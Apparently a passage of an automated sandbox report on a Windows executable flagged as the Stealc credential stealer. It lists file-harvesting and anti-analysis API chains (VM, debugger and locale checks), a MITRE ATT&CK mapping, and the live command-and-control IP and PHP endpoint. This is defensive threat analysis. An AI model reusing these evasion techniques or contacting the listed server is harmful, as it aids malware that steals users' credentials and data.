Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0089F925 push eax; ret	0_2_0089F943
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0089F934 push eax; ret	0_2_0089F943
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0089C954 push 7DD07DC0h; iretd	0_2_0089C965

Source: uCEeVGAWIB.exe

Static PE information: section name: .text entropy: 7.486368351428681

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

0_2_00419860

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-26394

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Evaded block: after key decision

graph_0-27555

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

API coverage: 6.5 %

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E430
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004138B0
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00414570
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414910
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040ED20
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE70
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DE10
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004016D0
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DA80
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_00413EA0
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F6B0
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0081C0D7
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0081DCE7
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0081E077
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00824107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00824107
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0081F917
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00811937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00811937
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0081E697
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0081EF87
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_008247D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_008247D7
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00823B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00823B17
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00824B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00824B77

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: 0_2_00401160 GetSystemInfo,ExitProcess,

0_2_00401160

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWr
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmp, uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwares
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	API call chain: ExitProcess graph end node	graph_0-26379
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	API call chain: ExitProcess graph end node	graph_0-26382
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	API call chain: ExitProcess graph end node	graph_0-26399
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	API call chain: ExitProcess graph end node	graph_0-26393
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	API call chain: ExitProcess graph end node	graph_0-26221
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	API call chain: ExitProcess graph end node	graph_0-26422
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	API call chain: ExitProcess graph end node	graph_0-26267

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0041AD48

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,00000000

0_2_004045C0

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

0_2_00419860

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]	0_2_00419750
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00810D90 mov eax, dword ptr fs:[00000030h]	0_2_00810D90
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_008299B7 mov eax, dword ptr fs:[00000030h]	0_2_008299B7
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0081092B mov eax, dword ptr fs:[00000030h]	0_2_0081092B
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0089AC23 push dword ptr fs:[00000030h]	0_2_0089AC23

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00417850

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041AD48
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0041CEEA SetUnhandledExceptionFilter,	0_2_0041CEEA
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041B33A
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0082B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0082B5A1
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0082D151 SetUnhandledExceptionFilter,	0_2_0082D151
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_0082AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0082AFAF

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: uCEeVGAWIB.exe PID: 1120, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00419600
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: 0_2_00829867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00829867

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_00417B90
Source: C:\Users\user\Desktop\uCEeVGAWIB.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_00827DF7

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00416920

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00417850

Source: C:\Users\user\Desktop\uCEeVGAWIB.exe

Code function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00417A30

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.uCEeVGAWIB.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.uCEeVGAWIB.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.uCEeVGAWIB.exe.810e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.uCEeVGAWIB.exe.b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.uCEeVGAWIB.exe.b80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.uCEeVGAWIB.exe.810e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2173056951.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: uCEeVGAWIB.exe PID: 1120, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.uCEeVGAWIB.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.uCEeVGAWIB.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.uCEeVGAWIB.exe.810e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.uCEeVGAWIB.exe.b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.uCEeVGAWIB.exe.b80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.uCEeVGAWIB.exe.810e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2173056951.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: uCEeVGAWIB.exe PID: 1120, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	11 Process Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	123 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
uCEeVGAWIB.exe	32%	ReversingLabs
uCEeVGAWIB.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://94.141.122.159/	true		unknown
http://94.141.122.159/baf27292fb61e144.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.141.122.159/baf27292fb61e144.php?F	uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://94.141.122.159	uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, uCEeVGAWIB.exe, 00000000.00000002.2241108646.000000000088E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://94.141.122.159/Y	uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://94.141.122.159/U	uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://94.141.122.159/baf27292fb61e144.phpOG	uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.5.dr	false	URL Reputation: safe	unknown
http://94.141.122.159/baf27292fb61e144.phpS	uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://94.141.122.159/baf27292fb61e144.phpR	uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		unknown
